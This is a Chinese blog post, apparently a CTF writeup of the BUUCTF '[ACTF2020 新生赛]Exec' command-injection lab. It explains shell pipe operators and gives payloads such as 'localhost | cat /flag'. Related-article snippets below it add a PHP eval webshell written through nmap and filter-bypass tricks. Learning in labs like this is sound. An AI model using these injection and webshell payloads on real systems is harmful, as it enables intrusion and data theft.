BUU 命令执行漏洞-[ACTF2020 新生赛]Exec

最新推荐文章于 2023-05-30 21:24:39 发布
最新推荐文章于 2023-05-30 21:24:39 发布
阅读量2.5k 收藏 1
点赞数 2
分类专栏: BUUCTF writeup 文章标签: linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Ivyyyyyy1/article/details/120814337
版权

一、题目

 

点开页面,经典的命令执行表单

先输入几个玩玩

 

 

都是正常回显,没啥怪东西

二、解题

1.  这里会用到 管道符 有关的知识点

| : 即按位或,会直接执行管道符之后的语句

|| : 即逻辑或,若管道符前语句为true则只执行前一句,否则只执行后一句

& : 即按位与,会直接执行前后两个语句

&& : 即逻辑与,若管道符前语句为true则执行两个语句,反之都不执行

2.  在Linux命令中,ls 用于列出目录条目

那么我们输入

localhost | ls /

 会显示根目录下所有条目

看到flag在根目录下,直接cat出来

payload:

localhost | cat /flag

 

三、总结

涉及Linux命令的题可以结合几个管道符进行操作,有时需要猜测后台的语句找合适的方法来构造输入

 

 

 

1vyyyyyy
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)"这个挑战中,参者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
BUUCTFWebExec命令执行漏洞
qq_70434663的博客
03-02 1036
在根目录中我们发现有一个flag文件,猜测我们的flag就在里面,所以我们需要使用命令来读取flag文件的内容。命令大家可以在网上查看,这里使用的命令是127.0.0.1 & cat /flag(也可以使用127.0.0.1 | cat /flag)了解拼接符后我们先试一下查看目录,发现使用127.0.0.1 && ls执行不了,使用127.0.0.1 & ls有回显。在进入靶场后发现窗口ping,猜测可能是SQL注入,也有可能是命令执行漏洞命令执行就用命令拼接符执行漏洞命令就行。
Buuctf GhostScript 沙箱绕过(命令执行漏洞(CVE-2019-6116)
ch258563的博客
05-30 531
Buuctf GhostScript 沙箱绕过(命令执行漏洞(CVE-2019-6116)
buuctf刷题 4(php&Rce&escapeshellarg cmd组合漏洞)
weixin_63231007的博客
05-05 1560
[MRCTF2020]Ez_bypass 1 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&
BUUCTF 之 [ACTF2020 新生]Exec命令执行漏洞
两个月亮
01-08 1242
这界面和这网页标题结合起来,相信给位都能猜到这个靶场中很有可能存在命令执行漏洞。文件往往位于根目录下,但也不要被反套路了。可以看到并没有我们期望的文件。这些文件夹都不需要管它,在。
从0到1CTFer成长之路-第三章-逻辑漏洞
黑白的博客
03-18 1516
声明 好好向大佬们学习!!! 攻击 逻辑漏洞 摘自 https://book.nu1l.com/tasks/#/ 使用BUUCTF在线环境 https://buuoj.cn/challenges 访问 http://3e95fcac-6f75-4037-82c4-b13e38bb3220.node3.buuoj.cn 是个炫酷的登录页面,本来还以为是通过任意用户注册,或者Session等,谁知道直接点提交,就能登进去买书 点击提交后,看到了买书的页面 映入眼帘的三本书 第一本flag,2000块
BUU刷题-Reveser-FlareOn5-Web2.0(WebAssembly逆向分析)
最新发布
05-26
WASM是一种二进制格式,它的设计目标是提供一种安全、快速且与平台无关的方式来执行代码。它不是JavaScript的替代品,而是与JavaScript协同工作,通过JavaScript调用来运行。WASM代码通常由高级语言编译而成,并通过...
Majin Buu Top HD Anime New Tabs Theme-crx插件
03-15
每次打开一个新选项卡,您将获得Majin Buu提供的不同高清壁纸 这个新主题包括时钟等等。 魔鬼的布欧(the devil,Buu),日本动漫《七龙珠》中的义与恶的角色,是《七龙珠》综合实力最强的BOSS。 这个名字来自电影...
POSN:POSN-BUU的源代码
04-01
POSN-BUU可能是该系统的一个特定实现或者模块,主要用于处理BUU(Base Unit Unit,基本单元)相关的定位任务。这个源代码是用C++编程语言编写的,C++是一种通用且高效的编程语言,特别适合开发对性能要求高的系统...
apachecn#apachecn-ctf-wiki#[WP/BUU/CTF]Cookie-Store-题解_車鈊的博客-CSD
07-25
来源:,涉及Cookie的使用方法操作方
BUUCTF [第三章 web进阶]逻辑漏洞
m0_49025459的博客
04-21 1251
这个就很离谱,我们直接购买FLAG我们发现钱不够 但是url上显示了支付的钱和商品数,连抓包都不用,直接将这个cost修改成负的就行了
BUUCTF】[ACTF2020 新生]Exec 1
qq_45972928的博客
05-06 1953
这是一道命令注入题 知识点 1、命令注入我们要防备其对于一些符号的过滤导致我们不能成功注入,所以我们要多了解一些符号。 2、直接分号分隔,一条一条顺序执行 3、| 按位或 4、|| 逻辑或 让||左边是执行错误的,这样它太会执行||右面的(这是计算机的惰性机制,只要前面执行正确了就不会再执行后面的了) 5、& 按位与 &前面和后面命令都要执行,无论前面真假 6、&& 逻辑与 如果前面为假,后面的命令就不执行,如果前面为真则再执行后面命令,这样两条命令都会被执行 1、进入网
BUUCTF web3
qq_61768489的博客
05-16 972
[WUSTCTF2020]朴实无华 这题主要就是绕过php特性 , 访问假flag页面 ,响应头里有文件提示 访问后得到源码,这里怎么乱码了 逐个击破 if(intval($num)<2020&&intval($num+1)>2021) 这里使用e科学计数法, $num=123e3 intval($num)解析出来是123 满足<2020 intval($num+1) 解析出来是 123e3+1 满足...
BUUCTF 命令执行/文件包含类型部分wp
qq_52988816的博客
11-24 7091
BUU差不多前两页题目中的该类型题,可能会有疏漏 [网鼎杯 2020 朱雀组]Nmap 考察nmap的利用 选项 解释 -oN 标准保存 -oX XML保存 -oG Grep保存 -oA 保存到所有格式 -append-output 补充保存文件 考虑到之前另一个题 payload 127.0.0.1 | ' <?php @eval($_POST["hack"]);?> -oG hack.php' 回显hacker,经查,php被过滤,使用短标签绕过 ' <?= @eval($_PO
ctf命令执行漏洞绕过方式小结
小飒的博客
08-06 3700
测试环境: 本地:Win10 phpstudy8.1 kali2020.2 外网:单位提供的linux靶机 一、命令分隔符 %0a – 换行符, %0d – 回车符, ; – 连续指令 && – | – || – 二、空格 < <> %09 $IFS$9 ${IFS} 三、读文件 (1)more:一页一页的显示档案内容 (2)less:与 more 类似,但是比 more 更好的是,他可以[pg dn][pg up]翻页 (3)head:查
buuctf web刷题记录
giaogiao123的博客
10-07 429
空格过滤常见ctfweb题目中 大佬的博客,持续学习学习学习 https://www.ghtwf01.cn/index.php/archives/273/ 通过学习知道怎么样绕过 以buuctf 首先使用burp抓包看看过滤了什么字符 基本上大部分字符都被过滤了,就很烦人 尝试构造?ip=127.0.0.1;ls 发现有两个东西 构造cat falg.php发现被过滤了,这怎么办??? flag被过滤,空格也被过滤 尝试%09发现不行 尝试nl%09* 发现被过滤了* 也就是说想要一键出flag不可能
CTFWeb-命令执行漏洞过滤的绕过姿势
热门推荐
道阻且长,行则将至。
04-29 1万+
文章目录前言CTF题目绕过姿势命令联合执行关键词的绕过内联执行绕过多种解法变量拼接内联执行Base64编码总结 前言 为了备战(划水)5 月份广东省的 “红帽杯” 网络安全,继续开始到 BUUCTF 平台练习 CTF 题目。在去年参加的第四届强网杯全国网络安全中,就遇到过命令执行漏洞绕过的题目 CTF解题-2020年强网杯参WriteUp(题目名称 “主动” ),当时采用了 base64 编码联合反引号、变量拼接两种方式绕过了 flag 关键字的过滤并读取了 flag 值: 本文目的在于结合 BU
buuctf刷题11( | + su -c命令&<?=``;进行rce&tp6.0任意文件操作漏洞&prase_url()函数漏洞)
weixin_63231007的博客
02-06 2053
[羊城杯 2020]Easyphp2 & [红明谷CTF 2021]write_shell & [GYCTF2020]EasyThinking & [N1CTF 2018]eating_cms
【CTF】buuctf web(一)——命令执行
m0_52923241的博客
07-26 2405
[ACTF2020 新生]Exec 抓包看看 得到信息:以post方式通过变量target传参
buu Quoted-printable
09-13
Quoted-printable是一种编码方法,常用于电子邮件中的MIME编码。它的作用是将非ASCII字符转换为可打印的ASCII字符。在Quoted-printable编码中,使用"="符号后跟两个十六进制数字来表示原本的字符。 在解密Quoted-printable编码时,我们可以使用在线工具来帮助我们。一个可以使用的工具是[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。 根据提供的信息,得到的flag是"flag{那你也很棒哦}"。 总结:Quoted-printable是一种常见的邮件编码方法,用于将非ASCII字符转换为可打印的ASCII字符。解密Quoted-printable编码可以使用在线工具,如[mxcz.net](http://www.mxcz.net/tools/QuotedPrintable.aspx)。根据提供的信息,得到的flag是"flag{那你也很棒哦}"。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值